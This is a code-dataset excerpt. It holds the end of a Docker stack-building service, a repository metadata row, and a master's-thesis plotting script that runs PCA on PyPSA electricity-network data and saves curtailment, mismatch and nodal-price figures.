ic.remove(image=full_tag)
def process_stack(stack, stack_name):
stack_path = stack.context.file.name
temp_dir = unpack_stack(stack_path)
os.chdir(temp_dir)
dc_file_path = get_dc_file_path(temp_dir, DOCKER_COMPOSE_FILE_DEFAULT_NAME)
if not os.path.exists(dc_file_path):
raise StackProcessingError(f"Can not find docker-compose file: '{dc_file_path}'")
stack.config = File(open(dc_file_path), DOCKER_COMPOSE_FILE_DEFAULT_NAME)
images_for_building = get_images_for_building(dc_file_path)
build_images(images_for_building, stack_name)
push_images(images_for_building, stack_name)
try:
clear_images(images_for_building, stack_name)
rmtree(temp_dir)
except Exception as e:
raise StackPostProcessingError(e)
def send_update(stack_name):
full_callback_url = CALLBACK_URL + stack_name
r = requests.post(full_callback_url)
if not r.ok:
raise StackPostProcessingError(f"Callback response is not ok: {r}, {r.content}")
def check_images(stack):
repositories = drc.repositories()
ok = True
for image_name in get_images_for_building(stack.config.file.name):
if f"{stack.name}_{image_name}" not in repositories:
ok = False
break
return ok
| 3,064 | 56 | 253 |
17670b80b678e8575dd39c563e1e3a2f22fe7ac1 | 45,313 | py | Python | Software/Network plotters/elec_only_OMEGA_plot.py | JonasVind/Master_Project_Code-Plots | f3efea1a30738b119bf6958cc490b940c90e2909 | [
"CC-BY-4.0"
] | null | null | null | Software/Network plotters/elec_only_OMEGA_plot.py | JonasVind/Master_Project_Code-Plots | f3efea1a30738b119bf6958cc490b940c90e2909 | [
"CC-BY-4.0"
] | null | null | null | Software/Network plotters/elec_only_OMEGA_plot.py | JonasVind/Master_Project_Code-Plots | f3efea1a30738b119bf6958cc490b940c90e2909 | [
"CC-BY-4.0"
] | null | null | null | # Import libraries
import os
import sys
import pypsa
import numpy as np
import pandas as pd
#from sympy import latex
import time
import math
# Timer
t0 = time.time() # Start a timer
# Import functions file
sys.path.append(os.path.split(os.getcwd())[0])
from functions_file import *
# Directory of file
#directory = os.path.split(os.path.split(os.path.split(os.getcwd())[0])[0])[0] + "\\Data\\elec_only\\"
directory = os.path.split(os.path.split(os.getcwd())[0])[0] + "\\Data\\elec_only\\"
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Generic file name
titleFileName = file
# Figure path
#figurePath = os.path.split(os.path.split(os.path.split(os.getcwd())[0])[0])[0] + "\\Figures\\elec_only\\"
figurePath = os.path.split(os.path.split(os.getcwd())[0])[0] + "\\Figures\\elec_only\\"
##############################################################################
##############################################################################
################################# Pre Analysis ###############################
##############################################################################
##############################################################################
# ------------------- Curtailment - CO2 constraints (Elec) ------------------#
# Path to save files
path = figurePath + "Pre Analysis\\"
# List of file names
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# List of constraints
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = ""#"Electricity Curtailment - " + file[12:-14]
fig = Curtailment(directory=directory, files=filename_CO2, title=title, constraints=constraints, fontsize=14, ylim=[-1,20], figsize=[6, 4.5])
SavePlot(fig, path, title=(file[12:-14] + " - Curtailment Elec (CO2)"))
# --------------- Curtailment - Transmission constraints (Elec) --------------#
# List of file names
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# List of constraints
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = ""#"Electricity Curtailment - " + file[12:-14]
fig = Curtailment(directory=directory, files=filename_trans, title=title, constraints=constraints, fontsize=14, rotation=-17.5, ylim=[-2,60], legendLoc="upper right", figsize=[6, 4.8])
SavePlot(fig, path, title=(file[12:-14] + " - Curtailment Elec (trans)"))
##############################################################################
##############################################################################
################################### MISMATCH #################################
##############################################################################
##############################################################################
# ------- Electricity produced by technology (Elec CO2 and Trans) -----------#
# Path to save files
path = figurePath + "Mismatch\\"
# List of file names
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# List of constraints
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
fig = ElecProductionOvernight(directory=directory, filenames=filename_CO2, constraints=constraints, fontsize=14, figsize=[6,6])
SavePlot(fig, path, title=(file[12:-14] + " - total elec generation (CO2)"))
# List of file names
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# List of constraints
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
fig = ElecProductionOvernight(directory=directory, filenames=filename_trans, constraints=constraints, rotation=-25, fontsize=14, figsize=[6,6.3])
SavePlot(fig, path, title=(file[12:-14] + " - total elec generation (trans)"))
# ------------------ Map Capacity Plots (Elec) ------------------#
# Path to save files
path = figurePath + "Mismatch\\Map Capacity\\"
# --- Elec ---
# Import network
network = pypsa.Network(directory+file)
fig1, fig2, fig3 = MapCapacityOriginal(network, titleFileName, ncol=3)
SavePlot(fig1, path, title=(file[12:-3] + " - Map Capacity Elec Generator"))
SavePlot(fig2, path, title=(file[12:-3] + " - Map Capacity Elec Storage Energy"))
SavePlot(fig3, path, title=(file[12:-3] + " - Map Capacity Elec Storage Power"))
# -------------------- Map Energy Plot (Elec) -------------------#
# Path for saving file
path = figurePath + "Mismatch\\Map Energy Distribution\\"
# Import network
network = pypsa.Network(directory+file)
# --- Elec ---
figElec = MapCapacityElectricityEnergy(network, file)
SavePlot(figElec, path, title=(file[12:-3] + " - Elec Energy Production"))
# --------------------- Map PC Plot (Elec) ----------------------#
# Path to save plots
path = figurePath + "Mismatch\\Map PC\\"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# --- Elec ---
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# ----------------------- Map Plot (Elec) -----------------------#
# Plot map PC for mismatch electricity
titlePlotElec = "Mismatch for electricity only"
for i in np.arange(6):
fig = MAP(eigenVectorsElec, eigenValuesElec, dataNames, (i + 1))#, titlePlotElec, titleFileName)
title = (file[12:-3] + " - Map PC Elec Mismatch (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ----------------------- FFT Plot (Elec) -----------------------#
# Path to save FFT plots
path = figurePath + "Mismatch\\FFT\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for i in np.arange(6):
fig = FFTPlot(TElec.T, varianceExplainedElec, PC_NO = (i+1))
title = (file[12:-3] + " - FFT Elec Mismatch (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# -------------------- Seasonal Plot (Elec) ---------------------#
# Path to save seasonal plots
path = figurePath + "Mismatch\\Seasonal\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for i in np.arange(6):
fig = seasonPlot(TElec, timeIndex, PC_NO=(i+1), PC_amount=6,dpi=400)
title = (file[12:-3] + " - Seasonal Plot Elec Mismatch (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# -------------------- FFT + Seasonal Plot (Elec) ---------------------#
# Path to save seasonal plots
path = figurePath + "Mismatch\\Timeseries\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for i in np.arange(6):
fig = FFTseasonPlot(TElec, timeIndex, varianceExplainedElec, PC_NO=(i+1), PC_amount=6,dpi=200)
title = (file[12:-3] + " - Timeseries Plot Elec Mismatch (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ----------------- Contribution plot (Elec) ------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Contribution\\"
# --- Elec ---
# Contribution
dircConElec = Contribution(network, "elec")
lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
for i in range(6):
fig = ConPlot(eigenValuesElec,lambdaCollectedConElec,i+1,10,suptitle=("Electricity Contribution - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Contribution Plot Elec (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- Response plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Response\\"
# --- Elec ---
# Response
dircResElec = ElecResponse(network,True)
lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
for i in range(6):
fig = ConPlot(eigenValuesElec,lambdaCollectedResElec,i+1,10,suptitle=("Electricity Response - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Response Plot Elec (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- Covariance plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Covariance\\"
# --- Elec ---
# Covariance
covMatrixElec = CovValueGenerator(dircConElec, dircResElec , True, normConstElec, eigenVectorsElec).T
for i in range(6):
fig = ConPlot(eigenValuesElec,covMatrixElec,i+1,10,suptitle=("Electricity Covariance - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Covariance Plot Elec (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- Combined Projection plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Projection\\"
# --- Elec ---
for i in range(6):
fig = CombConPlot(eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec, i+1, depth = 6) #, suptitle=("Electricity Projection - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Projection Plot Elec (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- PC1 and PC2 combined plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Combined Plot\\"
# --- Elec ---
fig = PC1and2Plotter(TElec, timeIndex, [1,2], eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec,PCType="withProjection")#,suptitle=("Electricity Mismatch - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Combined Plot Elec (lambda 1 & 2)")
SavePlot(fig, path, title)
# ---------------------- Bar plot CO2 constraint --------------------------- #
# Path to save bar plots
path = figurePath + "Mismatch\\Bar\\"
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# Variable to store mismatch PC componentns for each network
barMatrixCO2Elec = []
for file in filename_CO2:
# --------------------------- Electricity -------------------------------#
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# Append value to matrix
barMatrixCO2Elec.append(varianceExplainedElec)
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = "" #"Number of PC describing variance of network as a function of $CO_{2}$ constraint"
xlabel = "$CO_{2}$ constraint"
suptitleElec = "" #("Electricity Mismatch - " + file[12:-14])
fig = BAR(barMatrixCO2Elec, 7, filename_CO2, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, bbox=(0.5,-0.28))
titleBarCO2Elec = (file[12:-14] + " - Bar CO2 Elec Mismatch")
SavePlot(fig, path, titleBarCO2Elec)
# ------------------ Bar plot Transmission constraint ----------------------- #
# Path
#path = "C:/Users/jense/OneDrive - Aarhus Universitet/Dokumenter/ร
rhus Universitet/Kandidat - Civilingeniรธr/11. Semester/Master Thesis/Shared Documents/Figures/elec_only/Bar/"
path = figurePath + "Mismatch\\Bar\\"
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# Variable to store mismatch PC componentns for each network
barMatrixTransmissionElec = []
for file in filename_trans:
# --------------------------- Electricity -------------------------------#
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# Append value to matrix
barMatrixTransmissionElec.append(varianceExplainedElec)
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = "Number of PC describing variance of network as a function of transmission constraint"
xlabel = "Transmission constraint"
suptitleElec = ("Electricity Mismatch - " + file[12:-14])
fig = BAR(barMatrixTransmissionElec, 7, filename_trans, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, rotation=-17.5, bbox=(0.5,-0.28))
titleBarTransmissionElec = (file[12:-14] + " - Bar Trans Elec Mismatch")
SavePlot(fig, path, titleBarTransmissionElec)
# ------------------ Change in contribution and response CO2 ----------------------- #
# Variable to store lambda values
lambdaContributionElec = []
lambdaResponseElec = []
lambdaCovarianceElec = []
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
for file in filename_CO2:
# --------------------------- Electricity -------------------------------#
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# Contribution Elec
dircConElec = Contribution(network, "elec")
lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
lambdaContributionElec.append(lambdaCollectedConElec)
# Response Elec
dircResElec = ElecResponse(network,True)
lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
lambdaResponseElec.append(lambdaCollectedResElec)
# Covariance Elec
covMatrix = CovValueGenerator(dircConElec, dircResElec , True, normConstElec, eigenVectorsElec)
lambdaCovarianceElec.append(covMatrix.T)
#%%
from functions_file import *
# general terms
pathContibution = figurePath + "Mismatch\\Change in Contribution\\"
pathResponse = figurePath + "Mismatch\\Change in Response\\"
pathCovariance = figurePath + "Mismatch\\Change in Covariance\\"
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of CO2 constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont (CO2)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of CO2 constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont app (CO2)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec response
figtitle = "Change in electricity response as a function of CO2 constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec response (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec response
figtitle = "Change in electricity response as a function of CO2 constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec response app (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of CO2 constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of CO2 constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response app (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in covariance'
figtitle = "Change in electricity covariance between mismatch and response as a function of CO2 constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance (CO2)"
SavePlot(fig, pathCovariance, saveTitle)
# Plot change in covariance
figtitle = "Change in electricity covariance between mismatch and response as a function of CO2 constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance app (CO2)"
SavePlot(fig, pathCovariance, saveTitle)
#%%
# ------------------ Change in contribution and response transmission ----------------------- #
# Variable to store lambda values
lambdaContributionElec = []
lambdaResponseElec = []
lambdaCovarianceElec = []
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
for file in filename_trans:
# --------------------------- Electricity -------------------------------#
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# Contribution Elec
dircConElec = Contribution(network, "elec")
lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
lambdaContributionElec.append(lambdaCollectedConElec)
# Response Elec
dircResElec = ElecResponse(network,True)
lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
lambdaResponseElec.append(lambdaCollectedResElec)
# Covariance Elec
covMatrix = CovValueGenerator(dircConElec, dircResElec , True, normConstElec,eigenVectorsElec)
lambdaCovarianceElec.append(covMatrix.T)
# general terms
pathContibution = figurePath + "Mismatch\\Change in Contribution\\"
pathResponse = figurePath + "Mismatch\\Change in Response\\"
pathCovariance = figurePath + "Mismatch\\Change in Covariance\\"
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of transmission constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont (trans)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of transmission constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont app (trans)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec contribution
figtitle = "Change in electricity response as a function of transmission constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec response (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec contribution
figtitle = "Change in electricity response as a function of transmission constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec response app (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of transmission constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of transmission constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response app (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in covariance
figtitle = "Change in electricity covariance as a function of transmission constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance (trans)"
SavePlot(fig, pathCovariance, saveTitle)
# Plot change in covariance
figtitle = "Change in electricity covariance as a function of transmission constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance app (trans)"
SavePlot(fig, pathCovariance, saveTitle)
#%%
##############################################################################
##############################################################################
################################ NODAL PRICE #################################
##############################################################################
##############################################################################
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# ----------------------- Map PC Plot (Elec + Heat) --------------------#
# Path to save plots
path = figurePath + "Nodal Price\\Map PC\\"
# --- Elec ---
# Prices for electricity for each country (restricted to 1000 โฌ/MWh)
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# PCA on nodal prices for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
# Plot map PC for electricity nodal prices
titlePlotElec = "Nodal price for electricity only"
for i in np.arange(6):
fig = MAP(eigenVectorsElec, eigenValuesElec, dataNames, (i + 1),size="medium")#, titlePlotElec, titleFileName)
title = (file[12:-3] + " - Map PC Elec NP (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------------ FFT Plot (Elec + Heat) -----------------------#
# Path to save FFT plots
path = figurePath + "Nodal Price\\FFT\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
fig = FFTPlot(TElec.T, varianceExplainedElec, PC_NO = i+1, title=file_name)
title = (file[12:-3] + " - FFT Elec NP (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ----------------------- Seasonal Plot (Elec + Heat) ------------------------#
# Path to save seasonal plots
path = figurePath + "Nodal Price\\Seasonal\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
fig = seasonPlot(TElec, timeIndex, PC_NO=(i+1), PC_amount=6, title=file_name)
title = (file[12:-3] + " - Seasonal Plot Elec NP (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
